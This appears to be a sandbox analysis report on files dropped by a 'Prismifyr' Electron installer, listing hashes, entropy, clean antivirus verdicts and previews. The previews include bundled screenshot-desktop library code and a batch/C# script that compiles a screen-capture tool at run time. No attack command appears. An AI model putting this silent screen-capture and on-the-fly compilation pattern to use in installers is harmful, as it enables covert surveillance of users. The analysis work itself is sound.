                                                                                                                                                                                                                        Preview:const fs = require('fs')..function unlinkP (path) {. return new Promise((resolve, reject) => {. fs.unlink(path, function (err) {. if (err) {. return reject(err). }. return resolve(). }). }).}..function readFileP (path) {. return new Promise((resolve, reject) => {. fs.readFile(path, function (err, img) {. if (err) {. return reject(err). }. resolve(img). }). }).}..function readAndUnlinkP (path) {. return new Promise((resolve, reject) => {. readFileP(path). .then((img) => {. unlinkP(path). .then(() => resolve(img)). .catch(reject). }). .catch(reject). }).}..function defaultAll (snapshot) {. return new Promise((resolve, reject) => {. snapshot.listDisplays(). .then((displays) => {. const snapsP = displays. .map(({ id }) => snapshot({ screen: id })). Promise.all(snapsP). .then(resolve). .catch(reject). }). .catch(reject). }).}..
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):350
                                                                                                                                                                                                                        Entropy (8bit):4.888222365859566
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:qRu9Td8oWRu9Tw3x4mUA+DrASbxjBAyAN0xxCG:O4iR44+DkGCyAW7
                                                                                                                                                                                                                        MD5:8951565428AA6644F1505EDB592AB38F
                                                                                                                                                                                                                        SHA1:9C4BEE78E7338F4F8B2C8B6C0E187F43CFE88BF2
                                                                                                                                                                                                                        SHA-256:8814DB9E125D0C2B7489F8C7C3E95ADF41F992D4397ED718BDA8573CB8FB0E83
                                                                                                                                                                                                                        SHA-512:7577BAD37B67BF13A0D7F9B8B7D6C077ECDFB81A5BEE94E06DC99E84CB20DB2D568F74D1BB2CEF906470B4F6859E00214BEACCA7D82E2B99126D27820BF3B8F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >. <asmv3:application>. <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">. <dpiAware>True/PM</dpiAware>. </asmv3:windowsSettings>. </asmv3:application>.</assembly>
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3366
                                                                                                                                                                                                                        Entropy (8bit):5.030309627152668
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:cGi28Qk4t83TRRSaRMPTTl7rvmEKsGLuSM:38stkIa6Pp71SM
                                                                                                                                                                                                                        MD5:D226502C9BF2AE0A7F029BD7930BE88E
                                                                                                                                                                                                                        SHA1:6BE773FB30C7693B338F7C911B253E4F430C2F9B
                                                                                                                                                                                                                        SHA-256:77A3965315946A325DDCF0709D927BA72AA47F889976CBCCF567C76CC545159F
                                                                                                                                                                                                                        SHA-512:93F3D885DAD1540B1F721894209CB7F164F0F6F92857D713438E0CE685FC5EE1FC94EB27296462CDEEDE49B30AF8BF089A1FC2A34F8577479645D556AAAC2F8E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:const exec = require('child_process').exec.const temp = require('temp').const path = require('path').const utils = require('../utils').const fs = require('fs').const os = require('os')..const {. readAndUnlinkP,. defaultAll.} = utils..function copyToTemp () {. const tmpBat = path.join(os.tmpdir(), 'screenCapture', 'screenCapture_1.3.2.bat'). const tmpManifest = path.join(os.tmpdir(), 'screenCapture', 'app.manifest'). const includeBat = path.join(__dirname, 'screenCapture_1.3.2.bat').replace('app.asar', 'app.asar.unpacked'). const includeManifest = path.join(__dirname, 'app.manifest').replace('app.asar', 'app.asar.unpacked'). if (!fs.existsSync(tmpBat)) {. const tmpDir = path.join(os.tmpdir(), 'screenCapture'). if (!fs.existsSync(tmpDir)) {. fs.mkdirSync(tmpDir). }. const sourceData = {. bat: fs.readFileSync(includeBat),. manifest: fs.readFileSync(includeManifest). }. fs.writeFileSync(tmpBat, sourceData.bat). fs.writeFileSync(tmpManifest, source
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14246
                                                                                                                                                                                                                        Entropy (8bit):4.755441316440423
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:4cr8sEcBeIXxqXhQsBxf5oBLBfXQM8ybCpGW1KTM+:4KEcRQBTxWlPZxWpG+Qx
                                                                                                                                                                                                                        MD5:DA0F40D84D72AE3E9324AD9A040A2E58
                                                                                                                                                                                                                        SHA1:4CA7F6F90FB67DCE8470B67010AA19AA0FD6253F
                                                                                                                                                                                                                        SHA-256:818350A4FB4146072A25F0467C5C99571C854D58BEC30330E7DB343BCECA008B
                                                                                                                                                                                                                        SHA-512:30B7D4921F39C2601D94A3E3BB0E3BE79B4B7B505E52523D2562F2E2F32154D555A593DF87A71CDDB61B98403265F42E0D6705950B37A155DC1D64113C719FD9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:// 2>nul||@goto :batch./*.:batch.@echo off.setlocal enableDelayedExpansion..:: find csc.exe.set "csc=".for /r "%SystemRoot%\Microsoft.NET\Framework\" %%# in ("*csc.exe") do set "csc=%%#"..if not exist "%csc%" (. echo no .net framework installed. exit /b 10.)..if not exist "%~n0.exe" (. call %csc% /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"%~n0.exe" "%~dpsfnx0" || (. exit /b !errorlevel!. ).).%~n0.exe %*.endlocal & exit /b %errorlevel%..*/..// reference.// https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8..using System;.using System.Runtime.InteropServices;.using System.Drawing;.using System.Drawing.Imaging;.using System.Collections.Generic;.using Microsoft.VisualBasic;..../// Provides functions to capture the entire screen, or a particular window, and save it to a file...public class ScreenCapture.{.. static String deviceName = "";. static Image capturedImage = null;.. /// Creates an Image obje
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):696
                                                                                                                                                                                                                        Entropy (8bit):4.674702516870425
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:+HH1etJBTi6aVHJ0cIHEVaObmPMPLBoSb2yMPsBOPwUEiob24A:4H1et3TaHekVokz2P6RUEid7
                                                                                                                                                                                                                        MD5:17A03CBB8922901E6AE5944F851B64C0
                                                                                                                                                                                                                        SHA1:6D848E2BC6A3C13F92C2C973451CEFE1677CFBF7
                                                                                                                                                                                                                        SHA-256:EE003BE425A3CE625C78491A6311A0F7654DA6A286892A2C035D0609B946415C
                                                                                                                                                                                                                        SHA-512:1738B65A96210A0AA567CEBC1D499A9E23C56C1310DBA250CF13C2C8CE675E2648FF5A5C5E0DDE155D5D26F1C635BE78B31F5B2D3AA1171E04B1346FD43F10D5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:{. "name": "screenshot-desktop",. "version": "1.15.0",. "description": "Capture a screenshot of your local machine",. "main": "index.js",. "dependencies": {. "temp": "^0.9.4". },. "devDependencies": {. "ava": "^5.0.1",. "standard": "^17.0.0". },. "repository": {. "type": "git",. "url": "https://github.com/bencevans/screenshot-desktop.git". },. "author": "Ben Evans <ben@bensbit.co.uk> (https://bencevans.io)",. "license": "MIT",. "homepage": "https://github.com/bencevans/screenshot-desktop#readme",. "funding": [. {. "type": "github",. "url": "https://github.com/sponsors/bencevans". }. ],. "release": {. "branches": [. "main". ]. }.}
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1897
                                                                                                                                                                                                                        Entropy (8bit):4.891790062892244
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YkoS7YCFJQvyxt3J765w6hIit41A2M3Q/M3gaOVuPVM3Qsva7:TLsCr3Ju8i4jMA/MQPVuPVMAR
                                                                                                                                                                                                                        MD5:17081F555FF4C8283F16A317C860B7B1
                                                                                                                                                                                                                        SHA1:6AF3BD46505E6B6B28EDEE93069AAD8D849571D9
                                                                                                                                                                                                                        SHA-256:B168CD32CB9FC6D1B4A61536B26E86536A876F23CA803B3EB0FB7F6B0EB5C059
                                                                                                                                                                                                                        SHA-512:48CAA7971C267820C7D4A2AAAFA5C2819B2667E5D1A86FAE0A259307E453087031018A199D3420F17CA8F743E829628C995E8BF6DA637954725BDF94CBC48317
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:const test = require('ava').const { path: tempPathSync } = require('temp').const { existsSync, unlinkSync } = require('fs').const screenshot = require('./')..test.before(async () => {. return screenshot.listDisplays().then(displays => {. console.log('Displays:', JSON.stringify(displays, null, 2), '\n'). }).})..test('screenshot', t => {. t.plan(1). return screenshot().then(img => {. t.truthy(Buffer.isBuffer(img)). }).})..function checkDisplays (t, displays) {. t.truthy(Array.isArray(displays)). displays.forEach(disp => {. t.truthy(disp.name). t.truthy(disp.id !== undefined). }).}..test('screenshot each display', t => {. if (screenshot.availableDisplays) {. return screenshot.availableDisplays().then(displays => {. checkDisplays(t, displays).. displays.forEach(display => {. screenshot(display.id). }). }). } else {. t.pass(). }.})..test('screenshot to a file', t => {. t.plan(1). const tmpName = tempPathSync({ suffix: '.jpg' }). retur
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):107520
                                                                                                                                                                                                                        Entropy (8bit):6.442687067441468
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                                                                        MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                                                                        SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                                                                        SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                                                                        SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):313526
                                                                                                                                                                                                                        Entropy (8bit):4.171463796711183
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:hgC8/wQXLwqHMp2ubdJbhlsN2CZz6ZU7A9Z9lYu1dVkoBzpLDTA:hgC8Xwqexre4awnG6s
                                                                                                                                                                                                                        MD5:53363BB7CD528EA31C8814AD4762709E
                                                                                                                                                                                                                        SHA1:9C0164AB60AD51BEAC9EA55637837DE010B9EEF1
                                                                                                                                                                                                                        SHA-256:C3711BC03E5540F83F97F5B11250CFBBB4A85DCF245E989D2CE62D7CAC1D76FB
                                                                                                                                                                                                                        SHA-512:D4B28DD51FE60A54918AEC1373501B51A29AA655E3D76A434FD6B6786A8CD5904CA17412A811BA1EB2922FF36F33714AC5AD08DC701DDADC32E86EC9EE5A1AE9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:...........R6..412.8.374.36-electron.0...........................................K..&...........<...`K....a........a........a2.......aj.......a2.......aN...............r.........2..............R..............r.........2........(Jb....Q.....@..F^.E..I.`.....(Jb...2U.....@..F^..`.....H...IDa........Db............D`.....A.D`.....D]D....Da..........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):665981
                                                                                                                                                                                                                        Entropy (8bit):5.1711156365299775
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:hBUhye6gCsgwqexre4awBTGWDgH1Q1dhgXFUhxRg/4RpZqCaBygPEkknFmJA:hBUhye6gCoLGWD9q1xNCaBVEznFmJA
                                                                                                                                                                                                                        MD5:C4FC645FD32EDAF0D55F751AA67B1F32
                                                                                                                                                                                                                        SHA1:9C65E5AD2165FBE595D21C3389CB1305F38B762E
                                                                                                                                                                                                                        SHA-256:B540AB0D1B5A45DE28E6E07183B0A18B526A100BE970817760BCB3D3DE421523
                                                                                                                                                                                                                        SHA-512:3410AEF0310AEF8289907B6FD5831106CAC8F804543CB63478586A1AD47B4C30BAB4A620D81A4B30D32255174E0EF4C44B0C1FD50F65510329B42D8F1DE60254
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:........#...)..B12.8.374.36-electron.0..........................................P....e.......P..........<........a........a........a........aj.......a2.......aN...............r.........2..............R..............r.........2........(Jb....Q.....@..F^.E..I.`.....(Jb...2U.....@..F^..`.....H...IDa........Db............D`.....A.D`.....D]D....Da..........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5448704
                                                                                                                                                                                                                        Entropy (8bit):6.33223199100096
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:iCG+XVpyPu0yb8pKePr1Avp4xC2JcLjX72xqiO9+O2Qx7D2ljQok9JxsUxBAJgsr:uiyPuvSlQlNxXV54FA
                                                                                                                                                                                                                        MD5:C3CDB8F0F45400C1AAB15FDB327E8106
                                                                                                                                                                                                                        SHA1:70255A55C71DB82128707064439D81E02324CBF0
                                                                                                                                                                                                                        SHA-256:DE6ED5D5B7425AA9087BA97D2430CBE37C2EF3D6F1262E9186C9623D45412EE8
                                                                                                                                                                                                                        SHA-512:A0FBCCCE96BC5CB1FF4640323E52C650E50D8704AED1964842543E7EEF37F8DF7F21112916BA8BB4198175BE8F2DF19CE4FAF527ED25CA4C387ED29DA478A9E9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." ......A.........`p;.......................................T...........`A........................................8.N.......N.P.....T......@R..X............T....|ON.....................`NN.(.....A.@.............N.8............................text.....A.......A................. ..`.rdata........A.......A.............@..@.data...H.....O......nO.............@....pdata...X...@R..Z....Q.............@..@.gxfg....-....S......hR.............@..@.retplne......S.......R..................tls....Y.....S.......R.............@..._RDATA........S.......R.............@..@.rsrc.........T.......R.............@..@.reloc.......T.......R.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):106
                                                                                                                                                                                                                        Entropy (8bit):4.724752649036734
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                                                        MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                                                        SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                                                        SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                                                        SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):894976
                                                                                                                                                                                                                        Entropy (8bit):6.606072951548216
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:7vBtBPY5xbcAl7iAP7u6Z5W1DYsHq6g3P0zAk7/BoxaKDz:7ZA+AdH7u6Z5W1DYsHq6g3P0zAk7+
                                                                                                                                                                                                                        MD5:3F0D1C04A2CAA19204802C496C710ECB
                                                                                                                                                                                                                        SHA1:484E6648F43B7AC1DFE4700FFFA50FFA61846DD0
                                                                                                                                                                                                                        SHA-256:AF052AA866DB97D28D29EE9C348A17A20D545F61240862893B6B6282AB6C00A9
                                                                                                                                                                                                                        SHA-512:3FF7243BA57CBE3A7B20764C0326373B5A4B2E77F0A211C2B7DBD4E568849D29F7902303AB129300A4BF42BDA94904E360B8348EE4FD132468E23BB9143E723E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........." .................W.......................................0............`A.........................................H..<!...i..P............@...b........... ..$....6.......................5..(.......@............n...............................text............................... ..`.rdata..T...........................@..@.data....L......."..................@....pdata...b...@...d..................@..@.gxfg....'.......(...h..............@..@.retplne.................................tls................................@..._RDATA..............................@..@.rsrc...............................@..@.reloc..$.... ......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9216
                                                                                                                                                                                                                        Entropy (8bit):5.5347224014600345
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:5lkE3uqRI1y7/xcfK4PRef6gQzJyY1rpKlVrw:5lkMBI1y7UKcef6XzJrpKY
                                                                                                                                                                                                                        MD5:17309E33B596BA3A5693B4D3E85CF8D7
                                                                                                                                                                                                                        SHA1:7D361836CF53DF42021C7F2B148AEC9458818C01
                                                                                                                                                                                                                        SHA-256:996A259E53CA18B89EC36D038C40148957C978C0FD600A268497D4C92F882A93
                                                                                                                                                                                                                        SHA-512:1ABAC3CE4F2D5E4A635162E16CF9125E059BA1539F70086C2D71CD00D41A6E2A54D468E6F37792E55A822D7082FB388B8DFECC79B59226BBB047B7D28D44D298
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../../../..Wy./../../....../..Wi./..Wx./..W~./..W{./..Rich./..................PE..L...T{mW...........!................p!.......0...............................p............@..........................5..o...l1..P....P.......................`.......................................................0...............................text............................... ..`.rdata.......0......................@..@.data........@......................@....rsrc........P......................@..@.reloc..d....`....... ..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):102400
                                                                                                                                                                                                                        Entropy (8bit):6.729923587623207
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:WNuZmJ9TDP3ahD2TF7Rq9cJNPhF9vyHf:WNuZ81zaAFHhF9v
                                                                                                                                                                                                                        MD5:C6A6E03F77C313B267498515488C5740
                                                                                                                                                                                                                        SHA1:3D49FC2784B9450962ED6B82B46E9C3C957D7C15
                                                                                                                                                                                                                        SHA-256:B72E9013A6204E9F01076DC38DABBF30870D44DFC66962ADBF73619D4331601E
                                                                                                                                                                                                                        SHA-512:9870C5879F7B72836805088079AD5BBAFCB59FC3D9127F2160D4EC3D6E88D3CC8EBE5A9F5D20A4720FE6407C1336EF10F33B2B9621BC587E930D4CBACF337803
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q....C...C...C...C...C...C...C...C...C...C...C...C...C.[.C...C.[.C...C.[.C...C.[.C...CRich...C........................PE..L...I..[...........!.....*...b...............@.......................................+....@..........................}..d....t..........X............................................................................@...............................text....).......*.................. ..`.rdata..TC...@...D..................@..@.data...l............r..............@....rsrc...X............x..............@..@.reloc..j............~..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12288
                                                                                                                                                                                                                        Entropy (8bit):5.719859767584478
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                                                                        MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                                                                        SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                                                                        SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                                                                        SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:7-zip archive data, version 0.4
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):97717470
                                                                                                                                                                                                                        Entropy (8bit):7.999996512479899
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:1572864:4/WnMbJr6Riuuogr2EgnzW/CKRa2mppLXAm28sas4LJnLWV5iB/LowOMhPMFCmLW:7M1r6R5i6E4zWI2mp1AYTTSuB/aMhPMa
                                                                                                                                                                                                                        MD5:4398810E959DC6DEE01D13314AA644A2
                                                                                                                                                                                                                        SHA1:3AEFDA9647614D442694C07889ABAB36EEF8C788
                                                                                                                                                                                                                        SHA-256:6EDC538BA178D3B057076A43052424130D0D15BF432EDEE2AC8B4311791C51A3
                                                                                                                                                                                                                        SHA-512:223FC982B27CD1D0CE26A84C231BDCE9AA1727937E4A341D07DA3289C772F51E6361E3E936BD44258D8DAAE484E550CAA51624E0416DE2D5BDED11822786A1F5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:7z..'......&........%........V....&..]...6....m#./.B11b....6...T$X.>2.......Ek5..g..0.U.....aD.....h.S..'...Q../...4.G.Q...j...ygUuv....>.Z."....... .......x/...0...w...U.&)9<.0.H.q7...j..0Y.,_.Q./{k5............5.h.r..%...w..`O.F%..sJ5.%....+^.M.!.@...-i-.1....J%i..6}kdO.j?k.V.........=.v...J.S.h.r.}x.Jg...!....Q.J....~@..w..........G..6.=*...JN..KUGb.{}....4.Pje~....w.0.a..H).r....[7K..;.z..........zo.[aT....}.z.{.5..a|M...8..8Q...J...x..<.....(.s...*I... F..}..S.yE........F...D..v-.l9.^.4r...z..}b..V..S.{...|m.O..{.|....2..`F.."..4.......D..b..J.w...:...7..?q....a..?....['...Z.6t..7.j...H.V.,b.H/.W...2.y.LZ.].z.8.).. E.I.u.xj.i......1....GV....K.E9~H.S.(.5.MI9C.eG..o .,..u...a....w..QJy..A#..P.......]...<F.7...j..0"... ...;f?..u.I.5C#....|.......Q.h..V.A..Ae....$|..........cP.>....6wW...|.....\.O...kw\..V.]$R&g....-...RV...)...;.....B...Fk.........Nw.(.h.YG.2.Ll..o`D....&.B...x...W.+v...j.sR].=...y.S..+kem4../*U)AK......G...:
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6656
                                                                                                                                                                                                                        Entropy (8bit):5.155286976455086
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:EC0504E6B8A11D5AAD43B296BEEB84B2
                                                                                                                                                                                                                        SHA1:91B5CE085130C8C7194D66B2439EC9E1C206497C
                                                                                                                                                                                                                        SHA-256:5D9CEB1CE5F35AEA5F9E5A0C0EDEEEC04DFEFE0C77890C80C70E98209B58B962
                                                                                                                                                                                                                        SHA-512:3F918F1B47E8A919CBE51EB17DC30ACC8CFC18E743A1BAE5B787D0DB7D26038DC1210BE98BF5BA3BE8D6ED896DBBD7AC3D13E66454A98B2A38C7E69DAD30BB57
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....~.\...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):434176
                                                                                                                                                                                                                        Entropy (8bit):6.584811966667578
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                                                                                                                                                                        SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                                                                                                                                                                        SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                                                                                                                                                                        SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Antivirus:
